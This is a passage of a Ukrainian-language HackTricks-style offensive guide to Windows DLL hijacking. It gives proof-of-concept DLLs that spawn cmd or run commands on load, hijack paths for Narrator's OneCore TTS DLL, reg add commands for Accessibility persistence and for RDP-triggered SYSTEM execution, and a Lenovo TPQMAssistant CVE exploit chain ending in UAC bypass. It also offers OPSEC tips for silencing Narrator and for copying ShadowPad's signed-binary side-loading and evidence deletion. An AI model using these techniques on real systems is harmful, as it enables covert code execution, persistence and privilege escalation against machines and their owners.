#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## Кейс: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe досі звертається при запуску до передбачуваної, мовно-специфічної localization DLL, яку можна hijack для arbitrary code execution та persistence.

Key facts
- Probe path (current builds): `%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- Legacy path (older builds): `%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- Якщо у шляху OneCore існує записувана DLL, контрольована зловмисником, вона завантажується і виконується `DllMain(DLL_PROCESS_ATTACH)`. Експорти не потрібні.

Discovery with Procmon
- Filter: `Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- Start Narrator and observe the attempted load of the above path.

Minimal DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC — безшумність

• Примітивний hijack спричинить відтворення звуку/підсвічування UI. Щоб залишатися безшумним, під час приєднання перераховуйте потоки Narrator, відкрийте головний потік (OpenThread(THREAD_SUSPEND_RESUME)) і застосуйте до нього SuspendThread; продовжуйте у власному потоці. Див. PoC для повного коду.

Trigger and persistence via Accessibility configuration

• Контекст користувача (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Завдяки наведеному, при запуску Narrator завантажується підкладений DLL. На secure desktop (екрані входу) натисніть CTRL+WIN+ENTER, щоб запустити Narrator.

RDP-triggered SYSTEM execution (lateral movement)

• Дозвольте класичний RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• Підключіться по RDP до хоста, на екрані входу натисніть CTRL+WIN+ENTER, щоб запустити Narrator; ваш DLL виконається як SYSTEM на secure desktop.
• Виконання припиняється, коли RDP-сесія закривається — виконуйте інжекцію/міграцію оперативно.

Bring Your Own Accessibility (BYOA)

• Ви можете клонувати вбудований запис реєстру Accessibility Tool (AT) (наприклад, CursorIndicator), відредагувати його так, щоб він вказував на довільний binary/DLL, імпортувати його, а потім встановити configuration на цю назву AT. Це дозволяє проксувати довільне виконання в рамках Accessibility framework.

Notes

• Запис у %windir%\System32 та зміна значень HKLM вимагають прав адміністратора.
• Вся логіка payload може знаходитися в DLL_PROCESS_ATTACH; експорти не потрібні.

Кейс: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

Цей кейс демонструє Phantom DLL Hijacking у Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), відстежене як CVE-2025-1729.

Деталі вразливості

• Компонент: TPQMAssistant.exe, розташований за C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask виконується щодня о 9:30 AM під контекстом залогіненого користувача.
• Directory Permissions: Доступний для запису CREATOR OWNER, що дозволяє локальним користувачам розміщувати довільні файли.
• DLL Search Behavior: Першочергово намагається завантажити hostfxr.dll з робочого каталогу і логить “NAME NOT FOUND”, якщо відсутній, що вказує на пріоритет пошуку в локальному каталозі.

Реалізація експлойта

Атакуючий може помістити шкідливий заглушковий hostfxr.dll у той самий каталог, експлуатуючи відсутність DLL для досягнення виконання коду в контексті користувача:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

Послідовність атаки

1. Як звичайний користувач, помістіть hostfxr.dll у C:\ProgramData\Lenovo\TPQM\Assistant\.
2. Очікуйте виконання планової задачі о 9:30 під контекстом поточного користувача.
3. Якщо адміністратор увійшов у систему під час виконання задачі, шкідливий DLL запускається в сесії адміністратора з рівнем цілісності medium.
4. Застосуйте стандартні техніки обходу UAC, щоб підняти привілеї з medium integrity до SYSTEM.

Приклад: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

Зловмисники часто поєднують MSI-based droppers з DLL side-loading для виконання payloads під довіреним, підписаним процесом.

Chain overview

• User downloads MSI. A CustomAction runs silently during the GUI install (e.g., LaunchApplication or a VBScript action), reconstructing the next stage from embedded resources.
• The dropper writes a legitimate, signed EXE and a malicious DLL to the same directory (example pair: Avast-signed wsc_proxy.exe + attacker-controlled wsc.dll).
• When the signed EXE is started, Windows DLL search order loads wsc.dll from the working directory first, executing attacker code under a signed parent (ATT&CK T1574.001).

MSI analysis (what to look for)

• CustomAction table:
• Look for entries that run executables or VBScript. Example suspicious pattern: LaunchApplication executing an embedded file in background.
• In Orca (Microsoft Orca.exe), inspect CustomAction, InstallExecuteSequence and Binary tables.
• Embedded/split payloads in the MSI CAB:
• Адміністративне витягнення: msiexec /a package.msi /qb TARGETDIR=C:\out
• Or use lessmsi: lessmsi x package.msi C:\out
• Look for multiple small fragments that are concatenated and decrypted by a VBScript CustomAction. Common flow:

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

Практичний sideloading з wsc_proxy.exe

• Помістіть ці два файли в одну папку:
• wsc_proxy.exe: легітимний підписаний хост (Avast). Процес намагається завантажити wsc.dll за іменем з його директорії.
• wsc.dll: DLL зловмисника. Якщо специфічні експорти не потрібні, DllMain достатній; в іншому випадку побудуйте proxy DLL і перенаправте потрібні експорти до оригінальної бібліотеки, запускаючи payload у DllMain.
• Побудуйте мінімальний DLL payload:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• Для вимог експорту використовуйте proxying framework (e.g., DLLirant/Spartacus) для створення forwarding DLL, який також виконує ваш payload.

• Ця техніка покладається на розв’язання імен DLL хост-бінарою. Якщо хост використовує абсолютні шляхи або safe loading flags (e.g., LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories), hijack може не спрацювати.

• KnownDLLs, SxS, and forwarded exports можуть впливати на пріоритет і повинні враховуватися при виборі host binary та набору експорту.

Signed triads + encrypted payloads (ShadowPad case study)

Check Point описали, як Ink Dragon розгортає ShadowPad, використовуючи тріаду з трьох файлів, щоб злитися з легітимним ПЗ, одночасно зберігаючи основний payload зашифрованим на диску:

1. Signed host EXE – постачальники такі як AMD, Realtek, або NVIDIA зловживаються (vncutil64.exe, ApplicationLogs.exe, msedge_proxyLog.exe). Атакуючі перейменовують виконуваний файл, щоб він виглядав як Windows-бінар (наприклад conhost.exe), але підпис Authenticode залишається дійсним.
2. Malicious loader DLL – скидається поруч із EXE під очікуваним іменем (vncutil64loc.dll, atiadlxy.dll, msedge_proxyLogLOC.dll). DLL зазвичай є MFC-бінарем, обфускованим за допомогою ScatterBrain; її єдине завдання — знайти зашифрований blob, розшифрувати його та reflectively map ShadowPad.
3. Encrypted payload blob – часто зберігається як <name>.tmp в тій самій директорії. Після memory-mapping розшифрованого payload, loader видаляє TMP-файл, щоб знищити судові докази.

Tradecraft notes:

• Перейменування підписаного EXE (при збереженні оригінального OriginalFileName в PE header) дозволяє йому маскуватися як Windows-бінар, зберігаючи підпис вендора, тому відтворюйте звичку Ink Dragon скидати conhost.exe-подібні бінарні файли, які насправді є утилітами AMD/NVIDIA.
• Оскільки виконуваний файл залишається довіреним, більшості allowlisting-контролів достатньо, щоб ваш malicious DLL знаходився поруч із ним. Зосередьтеся на кастомізації loader DLL; підписаний батьківський файл зазвичай може працювати без змін.
• ShadowPad’s decryptor очікує, що TMP-blob буде знаходитися поруч із loader і бути доступним для запису, щоб він міг обнулити файл після mapping. Тримайте директорію доступною для запису, поки payload не завантажиться; як тільки він у пам’яті, TMP-файл можна безпечно видалити для OPSEC.

References

• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.